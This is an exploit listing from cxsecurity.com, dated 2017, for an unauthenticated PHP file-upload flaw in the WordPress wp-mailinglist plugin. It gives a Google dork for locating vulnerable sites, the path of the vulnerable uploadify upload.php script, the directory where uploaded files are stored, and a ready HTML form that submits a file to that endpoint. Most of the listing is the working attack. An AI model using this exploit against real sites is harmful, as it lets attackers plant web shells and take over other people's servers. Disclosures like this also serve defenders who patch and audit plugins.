Wordpress plugins wp-mailinglist upload File Vulnerability | CSRF

2017.08.19
iq Dyar Sahdi (IQ) iq
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################# # Exploit Title : Wordpress plugins wp-mailinglist upload File Vulnerability | CSRF # Author : Dyar Sahdi # Google Dork : inurl:/wp-content/plugins/wp-mailinglist/ # Tested on : Linux # data : 2017-8-18 ################################################################################# # # # if msg : No file data was posted An existing vulnerability # # [!] Exploit : 127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php # # [!] File Location : http:/127.0.0.1/path/wp-content/uploads/wp-mailinglist/FILE_NAME.php ################################################################################# #CSRF: ################################################################################# <html> <body> <form action="127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php" method="POST" enctype="multipart/form-data"> <input type="file" name="upfile" /> <input type="submit" value="Submit" /> </form> </body> </html> ##############################################################################

References:



Vote for this issue:
0%
100%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top